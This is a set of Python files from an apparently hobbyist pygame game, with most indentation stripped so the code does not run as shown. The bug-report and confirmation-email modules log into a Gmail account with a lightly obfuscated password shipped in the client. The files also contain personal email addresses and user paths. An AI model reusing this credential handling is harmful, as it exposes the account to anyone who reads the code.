TMP = os.path.join(
'/tmp/', 'stderr.tmp') if os.name == 'posix' else os.path.join(os.getenv('TMP'), 'stderr.tmp')
def main(project_name, exception, *other_info):
"""
main function for sending mail.
"""
exception.args = [str(arg) for arg in exception.args]
print(exception.args)
exception_traceback_details, exception_message = get_details(exception)
email = build_message(project_name, exception_message,
exception_traceback_details, *other_info)
send_message(email)
def send_message(message):
"""
sends message to the bug report address
"""
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
# i dont want random people just emailing me!!
decrypter = Fernet(HIUEFWILEIURFHE)
data = decrypter.decrypt(FYUKYFVKFYVHUFL).decode()
server.ehlo()
server.login('bugreporter.smr@gmail.com', data)
server.sendmail('bugreporter.smr@gmail.com',
'bugreporter.smr@gmail.com', message)
server.close()
def build_message(project, tbmessage, details, *args):
"""
build and return a email that contains the
traceback.
"""
bottomline = ',\n'.join(args) if len(args) > 0 else 'Nope'
sender = reciever = 'bugreporter.smr@gmail.com'
name = os.name
build = platform.platform()
email_string = f"""
From: {sender}
To: {reciever}
Subject: bug in {project} on a {name} system :(
platform:
{build}
details (traceback):
{details}
the message (even though it showed up before):
{tbmessage}
any extra things?
{bottomline}
sincerely, automatic message that has no heart :)
"""
return email_string
def get_details(exception):
"""
return the details of the traceback
"""
tbstring = ''.join(traceback.format_exception(
type(exception), exception, exception.__traceback__))
tbargs = ', '.join(exception.args)
return tbstring, tbargs
def default_smr(exception, *args):
main('stickman\'s new world', exception, *args)
try:
raise SyntaxError
except BaseException as e:
main('test', e)
"""
dirtools.py
this module's aim is to gather a directory tree into a dictionary.
"""
import os
import io
def gather_tree(dir='.', inputmethod=io.TextIOWrapper.read, previousdict=None):
"""
gathers this tree into a dict.
directories will become sub-dictionaries.
files will become whatever `inputmethod` returns for them
(their text contents by default).
"""
import pygame as pg
pg.init()
a = pg.font.Font('freesansbold.ttf', 32)
s = pg.Surface((100, 100))
s.fill((255, 255, 255))
s.blit(a.render('hello', True, (0, 0, 0)), (0, 0))
pg.image.save(s, 'C:\\Users\\michael\\desktop\\s.png')
import os
os.chdir(r'C:\Users\Michael\Desktop\stickmanranger')
print(
'hi! I am formatting your files in your current project, stickmanranger!')
for i in os.listdir():
try:
if i.endswith('.py'):
print('formatting %a' % i)
os.system('yapf -i %s' % i)
except:
pass
print('done!')
import time
time.sleep(1)
import math
import pygame as pg
from pygame.locals import QUIT
FPS = 20
CLOCK = pg.time.Clock()
class GravityItem:
weight = 10 # weight is amount of pixels it should move down per frame - momentum
sizey = sizex = 10
def __init__(self, img, pos):
self.img = img
self.update_coords(pos)
def update_coords(self, pos):
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def draw(self, surface, override_pos=None):
if override_pos is not None:
self.update_coords(override_pos)
surface.blit(self.img, self.topright)
def move_gravity_momentum(self, momentum, px_x):
to_move = momentum - self.weight
# if momentum is greater than weight, it will move up
self.update_coords((
self.topright[0] - px_x,
self.topright[1] + to_move,
))
def get_top_of_arc(self, enemy_pos):
# use parabola, thx to Dracobot
pass  # TODO: arc/apex calculation still to be written
def main():
mainsurf = pg.display.set_mode((400, 400))
sprite = pg.Surface((10, 10))
sprite.fill((0, 255, 0))
gv = GravityItem(sprite, (200, 200))
while True:
for event in pg.event.get():
if event.type == QUIT:
pg.quit()
raise SystemExit
gv.move_gravity_momentum(10, 1)
gv.draw(mainsurf)
pg.display.flip()
CLOCK.tick(FPS)
mainsurf.fill((255,) * 3)
if __name__ == '__main__':
main()
from multiprocessing import *
import time
def s():
time.sleep(1)
print('hi!')
class Main():
def do(self):
print('hi!')
time.sleep(1)
def start(self):
def a():
pass
self.s = Process(target=a)
self.s.start()
if __name__ == '__main__':
Main().start()
Main().start()
# this is a stupid comment
pass
import sys
import threading
try:
import chwsuakeuegy
except Exception as l:
d = l
def raise_d():
raise d
sys.stderr = open('C:\\users\\michael\\desktop\\stderr.txt', 'w')
raise_d()
print('??')
sys.stderr.close()
import pygame
from pygame.locals import *
# --- constants --- (UPPER_CASE names)
SCREEN_WIDTH = 430
SCREEN_HEIGHT = 410
#BLACK = ( 0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
FPS = 30
# --- classses --- (CamelCase names)
# empty
# --- functions --- (lower_case names)
# empty
# --- main ---
# - init -
pygame.init()
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
#screen_rect = screen.get_rect()
pygame.display.set_caption(
"Fracking System (because \"Tracking System\" sounded too wierd")
# - objects -
rectangle = pygame.rect.Rect(0, 0, 30, 30)
rectangle_draging = False
# - mainloop -
clock = pygame.time.Clock()
running = True
while running:
# - events -
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
if rectangle.collidepoint(event.pos):
rectangle_draging = True
mouse_x, mouse_y = event.pos
offset_x = rectangle.x - mouse_x
offset_y = rectangle.y - mouse_y
elif event.type == pygame.MOUSEBUTTONUP:
if event.button == 1:
rectangle_draging = False
elif event.type == pygame.MOUSEMOTION:
if rectangle_draging:
mouse_x, mouse_y = event.pos
rectangle.x = mouse_x + offset_x
rectangle.y = mouse_y + offset_y
# - updates (without draws) -
# empty
# - draws (without updates) -
screen.fill(WHITE)
pygame.draw.rect(screen, RED, rectangle)
pygame.display.flip()
# - constant game speed / FPS -
clock.tick(FPS)
# - end -
pygame.quit()
import math
import sys
import os
from pprint import pprint
import pygame as pg
from pygame.locals import QUIT
sys.stdout = open(os.path.join(os.environ['USERPROFILE'], 'Desktop', 'stdout.log'), 'w')
CLOCK = pg.time.Clock()
FPS = 60
class Arcer:
def __init__(self, img, range_, pos):
self.img = img
self.range = range_
self.rect = img.get_rect(topleft=pos)
self.sizey = self.rect.height
self.sizex = self.rect.width
self.update_coords(pos)
def update_coords(self, pos):
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
self.rect = self.img.get_rect(topleft=pos)
def draw(self, surf):
surf.blit(self.img, self.topright)
def get_parabola(self, target):
f = lambda x: (2 / math.pi) * math.atan(2 * (chary - tary) / (charx - tarx) ** 2 * (x - tarx))
pt2 = tarx, tary = target
pt1 = charx, chary = self.topleft
playx, playy = [], []
actualx = charx
actualy = chary
i = charx
print('local variables before while loop:', end='')
pprint(locals())
while i <= 610 and i >= -1000:
perc = f(actualx)
print('actualx:', actualx, 'actualy:', actualy)
print('playy: ', playy, '\n', 'playx: ', playx)
print('charx, chary, tarx, tary to make sure they arent changing:', charx, chary, tarx, tary)
actualy += perc
actualx += 1 - perc
playy.append(math.floor(actualy))
playx.append(math.floor(actualx))
if tarx >= charx:
i += 1
else:
i -= 1
return playx, playy
# if val == 0:
# while i <= 610 and i >= -1000:
# array.append((chary, round((chary - tary) / val * pow((i - tarx), 2) + tary)))
# if tarx >= charx:
# i += 1
# else:
# i -= 1
# else:
# while i <= 610 and i >= -1000:
# array.append((i, round((chary - tary) / val * pow((i - tarx), 2) + tary)))
# if tarx >= charx:
# i += 1
# else:
# i -= 1
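# a simpler, self-contained way to build an arc between two points (sketch only,
# not the routine used by get_parabola above): interpolate start -> target and
# bow the path upward with the quadratic bump 4*t*(1-t).
def sample_arc(start, target, rise=50, steps=60):
    """return steps + 1 (x, y) points from start to target, lifted by `rise`
    pixels at the midpoint (pygame's y axis grows downward, hence the minus)."""
    (x1, y1), (x2, y2) = start, target
    points = []
    for i in range(steps + 1):
        t = i / steps
        x = x1 + (x2 - x1) * t
        y = y1 + (y2 - y1) * t - rise * 4 * t * (1 - t)
        points.append((round(x), round(y)))
    return points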
def main():
display = pg.display.set_mode((800, 400))
testsurf = pg.Surface((10, 10))
testsurf.fill((0, 255, 0))
target = (300, 300)
test = Arcer(testsurf, 100, (20, 20))
a = pg.Surface((10, 10))
a.fill((0, 0, 255))
display.blit(a, target)
arr = test.get_parabola(target)
#print(arr)
index = 0
import time
time.sleep(3)
while True:
for ev in pg.event.get():
if ev.type == QUIT:
pg.quit()
raise SystemExit
pg.display.update()
display.fill((0, 0, 0))
display.blit(testsurf, (arr[0][index], arr[1][index]))
#test.draw(display)
#print(index)
index += 1
CLOCK.tick(25)
display.blit(a, target)
if __name__ == '__main__':
main()
"""
request_email.py
requests the user's email address for bug reports.
"""
import tkinter as tk
import os
MESSAGE = '''you can enter your email
address here, and if the game crashes,
it should be reported to me,
and I can get back to you and \ntry and get it fixed!\n
(it is completely optional,\npress \'skip\' to continue)
if you don't get it, it means you didn't enter the correct email address.
contact me at <michaelveenstra12@gmail.com> for help if that happens
you should receive a confirmation email :)
oh yeah, I won't sell it to anyone either'''
try:
FILE = os.path.join((os.environ['USERPROFILE'] if os.name ==
'nt' else os.environ['HOME']), '.stickman_new_world', 'useremail')
except KeyError:
wrong_os()
def main():
print('hi')
variables = {}
if os.path.exists(FILE):
return
root = tk.Tk()
root.title('email address')
root.geometry('250x270')
root.protocol('WM_DELETE_WINDOW', lambda: exit(variables))
entry = tk.Entry(root, text='email:')
entry.place(anchor='center', relx=0.5, rely=0.5)
entry.pack(fill=None, expand=True)
label = tk.Label(root, text=MESSAGE)
label.pack(fill=None, expand=True)
skip = tk.Button(root, text='skip', command=lambda: exit(variables))
skip.place(x=220, y=100)
skip.pack()
done = tk.Button(root, text='done',
command=lambda: get_text(entry, variables))
done.place(x=200, y=100)
done.pack()
while True:
print('hi')
if variables.get('quit'):
return
elif variables.get('entry_data'):
remember(variables)
send_confirm(variables)
root.destroy()
root.update()
def get_text(entry, variables):
print(entry.get())
variables['entry_data'] = entry.get()
def exit(v):
v['quit'] = True
def remember(item):
with open(FILE, 'w') as openfile:
openfile.write(item['entry_data'])
exit(item)
def send_confirm(items):
import smtplib
import bugreport
from cryptography.fernet import Fernet
sender = 'bugreporter.smr@gmail.com'
reciever = [items['entry_data']]
message = f'''To: <{reciever}>
From: <{sender}>
Subject: confirmation email
Hi! if you are receiving this email, it means you have successfully
gotten your email address to me. Since you didn't give your password,
you shouldn't have any troubles. I will only use this when I have a very important
thing to tell you, or if the game crashes on your computer, I will be alerted
and try to fix the problem and tell you about it as well. Thanks!
-sincerely, Michael Gill (creator of stickman\'s new world)
'''
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
a = Fernet(bugreport.HIUEFWILEIURFHE).decrypt(
bugreport.FYUKYFVKFYVHUFL).decode()
server.ehlo()
server.login(sender, a)
server.sendmail(sender, reciever, message)
server.close()
try:
main()
except Exception as e:
import bugreport
bugreport.default_smr(e, 'in request_email')
import pygame as pg
from pygame.locals import *
from threading import Thread
FPS = 60
SCREEN_X, SCREEN_Y = 800, 600
RECT_X, RECT_Y = 10, 10
RIGHT_CLICK = 1
GREEN = (0, 200, 0)
RED = (200, 0, 0)
def main():
pg.init()
global DISPLAY, CLOCK
DISPLAY = pg.display.set_mode((SCREEN_X, SCREEN_Y))
CLOCK = pg.time.Clock()
screen_image = pg.image.load('..\\data\\dash_skeleton.png').convert()
DISPLAY.blit(screen_image, (0, 0))
rect1 = Rect(SCREEN_X // 2, SCREEN_Y // 2, RECT_X, RECT_Y)
drag = False
while True:
for event in pg.event.get():
if event.type == QUIT:
pg.quit()
raise SystemExit
drag_if_supposed_to(rect1, event, drag)
pg.display.update()
DISPLAY.blit(screen_image, (0, 0))
pg.draw.rect(DISPLAY, GREEN, rect1)
pg.display.flip()
CLOCK.tick(FPS)
def drag_if_supposed_to(rect, event, drag=False):
if event.type == MOUSEBUTTONDOWN:
if event.button == RIGHT_CLICK and rect.collidepoint(event.pos):
print('boccoloni')
drag = True
mouse_x, mouse_y = event.pos
off_x = rect.x - mouse_x
off_y = rect.y - mouse_y
elif event.type == MOUSEBUTTONUP:
if event.button == RIGHT_CLICK:
drag = False
elif event.type == MOUSEMOTION:
if drag:
mouse_x, mouse_y = event.pos
rect.x = mouse_x + off_x
rect.y = mouse_y + off_y
return drag
main()
from time import sleep
import os
while True:
os.system('python format.py')
sleep(10 * 60)
"""a replacement and better written file than main.py.
for starting the game.
"""
from argparse import Namespace
import copy
import os
# pylint: disable=no-name-in-module
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEMOTION
import pygame as pg
from class_.character_image import CharacterImage
import class_
from database import COLOURS, MAIN_GAME_STATE
import database
import gameplay
# window sizes
WIN_X, WIN_Y = 800, 600
MID_X = WIN_X // 2
MID_Y = WIN_Y // 2
CENTRE = MID_X, MID_Y
CENTRE_X, CENTRE_Y = database.SURFACE.get_rect().center
WHITE = COLOURS['white']
BLACK = COLOURS['black']
FPS = 60
PICS = database.PICS
# (:()-|--<
# parts created on computer, assembled in canada.
# NO BATTERIES REQUIRED
# (except in the computer, maybe)
def _border(surf, colour):
"""puts a rectangular border around
surf's rectangle.
"""
rect = surf.get_rect()
bottom = rect.bottomleft, rect.bottomright
top = rect.topleft, rect.topright
left = rect.topleft, rect.bottomleft
right = rect.topright, rect.bottomright
lines = [(rect.bottomright[0] - 1, rect.bottomright[1] - 1),
(rect.bottomleft[0], rect.bottomleft[1] - 1),
(rect.topleft[0], rect.topleft[1]),
(rect.topright[0] - 1, rect.topright[1])]
pg.draw.lines(surf, colour, True, lines)
class Box:
"""box that can hold an image."""
border = True
selected = False
def __init__(self,
topleft,
width,
height,
colour=BLACK,
image=None,
onclick=lambda: None,
):
self.topleft = topleft
self.colour = colour
self.image = image
self.width = width
self.height = height
self.onclick = onclick
left, top = self.topleft
self.rect = pg.Rect((left, top), (self.width, self.height))
def draw(self, surf):
"""draw the box to the screen."""
rect = self.rect
if self.selected:
# make the box red instead.
pg.draw.rect(surf, COLOURS['red'], rect, 1)
else:
pg.draw.rect(surf, self.colour, rect, 1)
if self.image is not None:
img_rect = self.image.get_rect()
img_rect.center = rect.center
surf.blit(self.image, img_rect)
def handle(self, event, *args, **kwargs):
"""handle the event. if it is clicked on, then call and return
self.onclick. if not, do nothing.
"""
try:
if self.rect.collidepoint(event.pos) and event.type == MOUSEBUTTONDOWN:
return self.onclick(*args, **kwargs)
except AttributeError:
# incorrect event.
pass
# clock for keeping track of FPS
CLOCK = pg.time.Clock()
# SURFACE is already created in database
SURFACE = database.SURFACE
class ClickableLabel:
"""a label that can be clicked. when it is, then call
a designated function.
"""
underlined = False
shaded = False
def __init__(self,
text,
pos,
function,
forecolour,
backcolour=None,
shade=True,
textsize=16,
*args,
**kwargs
):
self.text = text
self.pos = pos
self.function = function
self.shade = shade
self.textsize = textsize
self.forecolour = forecolour
self.backcolour = backcolour
self.args = args
self.kwargs = kwargs
def _shade(self, colour=COLOURS['grey']):
"""shade the current rect."""
newsurf = pg.Surface((self.rect.width, self.rect.height))
newsurf.set_alpha(75)
newsurf.fill(colour)
self.textsurf.blit(newsurf, (0, 0))
def draw(self, surface):
"""draw the label to the screen."""
fontobj = pg.font.Font(
os.path.join('data', 'Michael`s Font.ttf'),
self.textsize,
)
textsurf = fontobj.render(
self.text, True, self.forecolour, self.backcolour)
textrect = textsurf.get_rect()
textrect.center = self.pos
self.rect = textrect
self.textsurf = textsurf
mouseover = self.rect.collidepoint(
pg.mouse.get_pos())
# print(pg.mouse.get_pos())
#@print(self.rect.topleft)
if mouseover:
# print('shading')
self._shade()
self.shaded = True
else:
self.shaded = False
# if self.underlined:
# start, end = self.rect.bottomleft, self.rect.bottomright
# pg.draw.line(surface, self.forecolour, start, end)
surface.blit(textsurf, textrect)
def update(self, surface):
"""updates the label."""
# if self.rect.underlined:
# self.rect.underline(surface)
def handle(self, event, surface):
if event.type == MOUSEMOTION:
if self.rect.collidepoint(event.pos):
self.shaded = True
elif (event.type == MOUSEBUTTONDOWN and
self.rect.collidepoint(event.pos)):
self.underlined = not self.underlined
def is_selected(self):
return self.rect.underlined
def main():
"""start the game"""
# set caption and title screen
pg.display.set_caption("Stickman's New World")
pg.display.set_icon(PICS['game_icon'])
# place starting image on screen
SURFACE.blit(PICS['title_screen'], (0, 0))
continue_ = True
while continue_:
SURFACE.blit(PICS['title_screen'], (0, 0))
SURFACE.blit(MAIN_GAME_STATE['CURSOR'], pg.mouse.get_pos())
for event in pg.event.get():
check_quit(event)
if event.type == MOUSEBUTTONDOWN:
# on to the next loop
continue_ = not continue_
pg.display.update()
func = lambda: None
continue_ = True
rects = draw_choices()
pg.mixer.music.load(os.path.join(
os.getcwd(), 'music', 'smnwtheme.mp3'
))
pg.mixer.music.play(-1) # loop forever, until stopped
while continue_:
SURFACE.blit(PICS['menu_background'], (0, 0))
label("Stickman's New World", CENTRE_X, 100, size=60)
for lbl in rects:
lbl.draw(SURFACE)
for event in pg.event.get():
check_quit(event)
for lbl in rects:
lbl.handle(event, SURFACE)
if event.type == MOUSEBUTTONDOWN and lbl.rect.collidepoint(*event.pos):
func = lbl.function
continue_ = False
SURFACE.blit(MAIN_GAME_STATE['CURSOR'], pg.mouse.get_pos())
pg.display.update()
CLOCK.tick(FPS)
func()
def drawopt(text, x, y, func=0):
"""draw text tto the screen at (x, y).
return class_.MyRect of rectangle."""
fontobj = pg.font.Font(os.path.join('data', 'Michael`s Font.ttf'), 32)
textsurf = fontobj.render(text, True, WHITE)
textrect = textsurf.get_rect()
textrect.center = (x, y)
SURFACE.blit(textsurf, textrect)
return class_.MyRect(textrect), textsurf, func
def check_quit(event):
"""check if event is a quit event. if it is, quit."""
if event.type == QUIT:
pg.quit()
raise SystemExit
def label(text, x, y, size=32, colour=WHITE):
"""draw a static label to the screen."""
fontobj = pg.font.Font(os.path.join('data', 'Michael`s Font.ttf'), size)
textsurf = fontobj.render(text, True, colour)
textrect = textsurf.get_rect()
textrect.center = (x, y)
SURFACE.blit(textsurf, textrect)
def draw_choices():
"""draw all the options to click on
on game start.
"""
# print(centre_x, centre_y)
# choices = [
# drawopt('New Game', centre_x, centre_y - 50, 1),
# drawopt('Load Game', centre_x, centre_y, 2),
# drawopt('Settings', centre_x, centre_y + 50, 3)
# ]
choices = [
ClickableLabel("New Game", (CENTRE_X, CENTRE_Y - 100),
RECT_FUNCS[1], WHITE, textsize=40),
ClickableLabel("Load Game", (CENTRE_X, CENTRE_Y),
RECT_FUNCS[0], WHITE, textsize=40),
ClickableLabel("Settings", (CENTRE_X, CENTRE_Y + 100),
RECT_FUNCS[2], WHITE, textsize=40),
]
return choices
START_X, START_Y = 100, WIN_Y // 2
def _make_coloured(box):
if box._colour == 0:
box._colour = 1
box.colour = COLOURS['red']
return box
else:
box._colour = 0
box.colour = COLOURS['white']
return None
def new_game():
char_imgs = [
CharacterImage('swordsman',
# fake weapon. only has colour attribute
Namespace(colour='grey'),
(START_X, START_Y),
None,
),
CharacterImage('angel',
Namespace(colour='gold'),
(START_X + 150, START_Y),
None,
),
CharacterImage('archer',
Namespace(colour='brown'),
(START_X + 300, START_Y),
None,
),
CharacterImage('spearman',
Namespace(colour='grey'),
(START_X + 450, START_Y),
None,
),
CharacterImage('wizard',
Namespace(colour='blue'),
(START_X + 600, START_Y),
None,
),
]
selected_char_imgs = [
CharacterImage('swordsman',
# fake weapon. only has colour attribute
Namespace(colour='grey'),
(12, 16),
None,
),
CharacterImage('angel',
Namespace(colour='gold'),
(12, 16),
None,
),
CharacterImage('archer',
Namespace(colour='brown'),
(12, 16),
None,
),
CharacterImage('spearman',
Namespace(colour='grey'),
(12, 16),
None,
),
CharacterImage('wizard',
Namespace(colour='blue'),
(12, 16),
None,
),
]
null = lambda: None
y = WIN_Y // 2 + 30
char_lbls = [
ClickableLabel(
'Swordsman',
(START_X, y),
null,
WHITE,
textsize=24
),
ClickableLabel(
'Angel',
(START_X + 150, y),
null,
WHITE,
textsize=24,
),
ClickableLabel(
'Archer',
(START_X + 300, y),
null,
WHITE,
textsize=24,
),
ClickableLabel(
'Spearman',
(START_X + 450, y),
null,
WHITE,
textsize=24,
),
ClickableLabel(
'Wizard',
(START_X + 600, y),
null,
WHITE,
textsize=24,
),
]
    # a list of four (character image, box) pairs; each chosen image is drawn inside its box.
chosen = [(None, None)] * 4
def set_(box):
old = get_selected()
# print(old, 'HoWdY YoU FeLlErS')
old.selected = False
box.selected = True
chosen_boxes = [
Box((250, 400), 30, 30, WHITE, onclick=lambda: set_(chosen_boxes[0])),
Box((350, 400), 30, 30, WHITE, onclick=lambda: set_(chosen_boxes[1])),
Box((450, 400), 30, 30, WHITE, onclick=lambda: set_(chosen_boxes[2])),
Box((550, 400), 30, 30, WHITE, onclick=lambda: set_(chosen_boxes[3])),
]
chosen_boxes[0].selected = True
def get_selected():
"""return the selected box."""
for i in chosen_boxes:
if i.selected:
# print(chosen_boxes.index(i))
return i
continue_ = True
num_selected = 0
next_button = ClickableLabel(
"Next", (700, 420), lambda: None, WHITE, textsize=50)
next_button.draw(SURFACE)
    if (None, None) not in chosen:
# fills the next_button.rect spot. will not show up yet
next_button.draw(SURFACE)
filled = False
while continue_:
SURFACE.blit(PICS['menu_background'], (0, 0))
        if (None, None) not in chosen:
next_button.draw(SURFACE)
filled = True
label('Choose your players:', MID_X, 75, 60)
for box in chosen_boxes:
box.draw(SURFACE)
for i in char_imgs:
i.build_image(SURFACE, COLOURS['beige'], False)
for i in char_lbls:
i.draw(SURFACE)
# if i.underlined:
# add_chosen(char_lbls, i, char_imgs[char_lbls.index(i)])
for event in pg.event.get():
check_quit(event)
for lbl in char_lbls:
lbl.handle(event, SURFACE)
if event.type == MOUSEBUTTONDOWN and lbl.rect.collidepoint(*event.pos):
# need to add the character's image to the selected box.
item = selected_char_imgs[char_lbls.index(lbl)]
box = chosen_boxes.index(get_selected())
chosen[box] = (item, get_selected())
if event.type == MOUSEBUTTONDOWN and \
next_button.rect.collidepoint(*event.pos) and \
filled:
continue_ = False
for box in chosen_boxes:
box.handle(event)
for pair in chosen:
if pair == (None, None):
break
character, box = pair
coords = box.topleft[0] + 10, box.topleft[1] + 17
character.update_coords(coords)
character.build_image(SURFACE, COLOURS['beige'], False)
# pg.display.update()
# print((str(num_selected) + "\n") * 10)
SURFACE.blit(MAIN_GAME_STATE['CURSOR'], pg.mouse.get_pos())
pg.display.update()
CLOCK.tick(24)
continue_ = True
MAIN_GAME_STATE["AREA"] = database.Area.MAP
MAIN_GAME_STATE["PLAYERS"] = get_characters_from_images([i[0] for i in chosen])
gameplay.main()
def get_characters_from_images(images):
"""get and return an actual character type, not
just an image of it.
"""
names = [i.type_ for i in images]
characters = []
namestotypes = {
'swordsman': class_.Swordsman,
'angel': class_.Angel,
'archer': class_.Archer,
'spearman': class_.Spearman,
'wizard': class_.Wizard,
}
    for num, name in enumerate(names, 1):
        characters.append(namestotypes[name](num, MAIN_GAME_STATE, copy.copy(database.DEFAULT_WEAPONS[name])))
return characters
class FakeWeapon:
def __init__(self, colour):
self.colour = colour
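# menu actions used by draw_choices(): index 1 starts a new game, while 0
# (Load Game) and 2 (Settings) are placeholders that currently do nothing.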
RECT_FUNCS = {
0: lambda: None,
1: new_game,
2: lambda: None,
}
if __name__ == '__main__':
main()
"""
dicts.py
this module holds functions and data that deal
with large dictionaries, which this game uses a lot
of
gather_pics: return a dictionary containing
string keys and pygame image equivalents.
COLOURS: a dictionary containing string keys
and RGB tuple values."""
import os
print('Howdy')
import pprint
from pygame.image import load
import pygame as pg
from database import ALL, COLOURS
__author__ = 'Michael Gill'
__version__ = '0.0'
CHANGE_COLOUR_DIRS = ('characters_parts',
'heads',
'attacks',
) + tuple(ALL['all_weapons'].values())
print(CHANGE_COLOUR_DIRS)
def gather_pics(dir='.'):
dictionary = {}
enddir = os.path.split(dir)[-1]
for item in os.listdir(dir):
if '.' in item:
pname, extension = [x.lower() for x in item.split('.')]
fname = os.path.join(dir, item)
if os.path.isdir(os.path.join(dir, item)):
dictionary[item] = gather_pics(fname)
elif extension in ('png', 'jpg'):
dictionary[pname] = pg.image.load(fname)
if enddir in CHANGE_COLOUR_DIRS:
# heads, attacks, and weapons should be of each colour
# print(dir)
di = dictionary[pname] = {}
for col in COLOURS:
# print(dir, col)
rgb_col = COLOURS[col]
di[col] = pg.image.load(os.path.join(dir, item))
change_colour_surface(di[col], *rgb_col)
return dictionary
def change_colour_surface(surface, r, g, b):
"""changes the colour of all parts of a
surface except for the transparent parts.
"""
arr = pg.surfarray.pixels3d(surface)
arr[:, :, 0] = r
arr[:, :, 1] = g
arr[:, :, 2] = b
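# Illustrative sketch (not part of the original module): recolour a copy of a
# sprite so the source surface stays untouched. pg.surfarray.pixels3d() keeps
# the surface locked while the returned array is alive, so the lock is only
# released once change_colour_surface() returns and the array goes out of scope.
def recoloured_copy(surface, rgb):
    copy = surface.copy()
    change_colour_surface(copy, *rgb)
    return copy
# e.g. red_icon = recoloured_copy(some_loaded_surface, COLOURS['red'])
# (some_loaded_surface stands in for any loaded pygame.Surface.)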
if __name__ == '__main__':
dict = gather_pics('data')
print('\n' * 1000)
pprint.pprint(dict)
# print(dict)
print('Howdy')
pg.image.save(gather_pics('data')['game_icon'], r'C:\Users\Michael\Desktop\test_images\howdy.png')
import subprocess
import platform
import os
if os.getcwd().endswith('game'):
os.chdir('..{0}updater'.format('\\' if os.name == 'nt' else '/'))
CMD = {
'Windows':
'auto_install.exe'
if os.path.exists('auto_install.exe') else ' python auto_install.py',
'Linux':
'auto_install'
    if os.path.exists('auto_install') else '/usr/bin/python3 auto_install.py'
}[platform.system()].split()
subprocess.Popen(CMD)
# kill the current process
raise SystemExit
"""
save.py- create game save for stickmans new world.
data: read_file
takes no arguments, and returns a data structure (dict)
of the save, without any of the classes.
write_file(data)
data must be a dict (or dict-like file like IniFile)
and write it to $HOME/.stickman_new_world/save/.smr-save on linux
or %USERPROFILE%/.stickman_new_world/save/.smr-save on windows
convert(data)
convert data from dict of strings to
actual stickman's new world data.
"""
import inifile
import os
import encrypt
from class_.inventory import InventoryHandler
def read_file():
game_state = {}
data_text, time = encrypt.decrypt()
data_file = os.path.join(
os.getenv('TMP'), '.save.ini') if os.name == 'nt' else '/tmp/.save.cfg'
with open(data_file, 'w') as open_file:
open_file.write(data_text)
ini_file = inifile.IniFile(data_file)
# print(ini_file.to_dict())
keys = ini_file.keys()
values = ini_file.values()
for key, value in zip(keys, values):
if '.' in key:
# value is in a category
klass, prop = key.split('.')
#print(klass, prop)
try:
game_state[klass]
except KeyError:
game_state[klass] = {}
game_state[klass][prop] = value
else:
game_state[key] = value
return game_state
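# Illustrative note: keys of the form "<section>.<prop>" are nested by read_file,
# e.g. {'player1.hp': '10', 'gold': '5'} becomes {'player1': {'hp': '10'}, 'gold': '5'}
# (example keys are made up; values stay strings until converted elsewhere).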
def write_file(data):
if isinstance(data, dict):
data = to_inifile(data)
encrypt.encrypt(data)
def to_inifile(dict_):
file_str = ''
for key in dict_:
file_str += '[{}]\n'.format(key)
for i in dict_[key]:
file_str += '{}={}\n'.format(i, dict_[key][i])
file_str += '\n'
return file_str
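# Illustrative note: to_inifile() turns one level of nesting into INI sections,
# e.g. {'player1': {'hp': 10, 'level': 2}} produces:
# [player1]
# hp=10
# level=2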
def make_inventory(dictionary):
pos = []
for i in dictionary:
pos.append(int(i.split('x')[0]))
maxx = max(pos)
pos = []
for i in dictionary:
pos.append(int(i.split('x')[1]))
maxy = max(pos)
inv = InventoryHandler(maxx, maxy)
inv.sort_dict(dictionary)
return inv
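# Illustrative note: make_inventory() expects keys shaped like "<column>x<row>",
# e.g. {'1x1': 'sword', '3x2': 'potion'} yields an InventoryHandler(3, 2)
# (the item values shown here are assumptions about the save format).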
if __name__ == '__main__':
write_file(open('misc\\shello.ini').read())
a = read_file()
#print(a)
#print(a['inventory'])
#print(make_inventory(a['inventory']))
"""settings.py- displays and changes the settings
for stickman's new world.
if the user settings file does not exist, the defaults from settings.json are used.
"""
import tkinter as tk
import os
import json
import platform
try:
import pwd
except ImportError:
# the OS is not linux
pass
__all__ = ['main', 'load_settings', 'save']
if platform.system() == 'Linux':
os.getlogin = lambda: pwd.getpwuid(os.getuid())[0]
DEF_NAME = 'settings.json'
USR_NAME = '.stickman_new_world{0}user_settings.json'.format(
'\\' if os.name == 'nt' else '/')
HOME = 'C:\\Users\\{}\\'.format(
os.getlogin()) if os.name == 'nt' else '/home/{}/'.format(os.getlogin())
print(HOME)
print()
SETTINGS_FILE_PATH = {
'posix':
HOME + USR_NAME if os.path.exists(HOME + USR_NAME) else 'settings.json',
'nt':
HOME + USR_NAME if os.path.exists(HOME + USR_NAME) else 'settings.json'
}[os.name]
SETTINGS_FILE = open(SETTINGS_FILE_PATH).read()
USR_SAVE_PATH = HOME + '{0}.stickman_new_world{0}'.format(
'\\' if os.name == 'nt' else '/')
USR_SAVE_FILE = HOME + USR_NAME
print(USR_SAVE_PATH)
print(SETTINGS_FILE_PATH)
def load_settings():
settings = json.JSONDecoder().decode(SETTINGS_FILE)
return settings
def main():
root = tk.Tk()
root.geometry('300x200')
root.title('settings')
root.protocol('WM_DELETE_WINDOW', lambda: save(usr_settings, root))
settings = load_settings()
settings_ = {}
print(settings)
for key, value in zip(settings, settings.values()):
if isinstance(value, bool):
settings_[key] = value
settings = settings_
print(settings)
usr_settings = settings.copy()
for i in usr_settings:
var = tk.IntVar()
var.set(usr_settings[i])
usr_settings[i] = var
for key, value, num in zip(settings, settings.values(), range(
len(settings))):
print(key, value, usr_settings)
tk.Checkbutton(
root, text=key, variable=usr_settings[key]).grid(
row=num, sticky=tk.W)
tk.mainloop()
def save(settings, win):
for i in settings:
# the settings are still IntVars
var = bool(settings[i].get())
# change them to normal ints
settings[i] = var
win.destroy()
if not os.path.exists(USR_SAVE_PATH):
os.mkdir(USR_SAVE_PATH)
# i like having an indent, for when i look at it :)
json_settings = json.dumps(settings, indent=4)
with open(USR_SAVE_FILE, 'w') as settings_file:
